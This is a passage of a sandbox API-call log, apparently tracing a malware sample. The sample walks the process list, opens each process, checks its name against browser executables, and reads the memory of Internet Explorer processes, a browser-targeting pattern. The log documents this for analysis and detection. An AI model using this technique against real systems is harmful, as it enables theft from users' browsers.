	[0234.662] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0234.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.662] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.663] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0234.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.663] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.663] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0234.664] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x740c
	[0234.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.664] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0234.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.665] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.665] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0234.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.666] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.666] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0234.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7410
	[0234.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.667] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0234.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.667] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.668] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0234.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.668] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.668] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0234.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7414
	[0234.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.669] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0234.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.670] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.670] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0234.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.670] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.671] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0234.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7418
	[0234.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.686] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0234.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.688] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.688] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0234.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.689] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.689] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0234.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x741c
	[0234.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.690] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0234.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.690] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.691] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0234.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.691] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.691] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0234.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7420
	[0234.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.692] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0234.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.692] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.692] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0234.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.693] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.693] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0234.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7424
	[0234.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.694] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0234.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.694] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.695] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0234.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.695] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.696] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0234.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7428
	[0234.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.696] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0234.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.697] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.698] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0234.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.698] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.699] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0234.699] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x742c
	[0234.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.700] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0234.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.700] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.701] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0234.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.701] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0234.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7430
	[0234.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.702] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0234.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.704] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.704] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0234.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.705] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0234.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7434
	[0234.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.706] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0234.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.707] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.707] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0234.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.708] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.708] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7438
	[0234.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.709] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0234.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.709] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0234.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.710] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0234.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.710] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.710] NtQueryInformationProcess (in: ProcessHandle=0x7438, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0234.710] ReadProcessMemory (in: hProcess=0x7438, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0234.710] ReadProcessMemory (in: hProcess=0x7438, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0234.710] ReadProcessMemory (in: hProcess=0x7438, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0234.710] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0234.711] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0234.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x743c
	[0234.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.712] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0234.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.712] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0234.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.712] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0234.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.712] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.713] NtQueryInformationProcess (in: ProcessHandle=0x743c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0234.713] ReadProcessMemory (in: hProcess=0x743c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0234.713] ReadProcessMemory (in: hProcess=0x743c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0234.713] ReadProcessMemory (in: hProcess=0x743c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0234.713] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0234.713] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7440
	[0234.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.714] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0234.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.714] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.715] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0234.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.715] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.715] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0234.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7444
	[0234.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.716] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0234.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.718] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.719] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0234.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.719] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.719] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7448
	[0234.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.720] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.720] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.721] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.721] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.721] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.722] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x744c
	[0234.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.723] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.723] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.724] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.724] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.750] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7450
	[0234.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.751] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.751] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.752] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.752] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.752] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.753] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7454
	[0234.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.753] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0234.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.753] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.754] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0234.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.754] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.755] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0234.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x7458
	[0234.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.756] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.756] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.756] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.757] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.757] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x745c
	[0234.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.758] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.758] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.758] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.759] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.759] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7460
	[0234.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.760] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.760] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.760] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
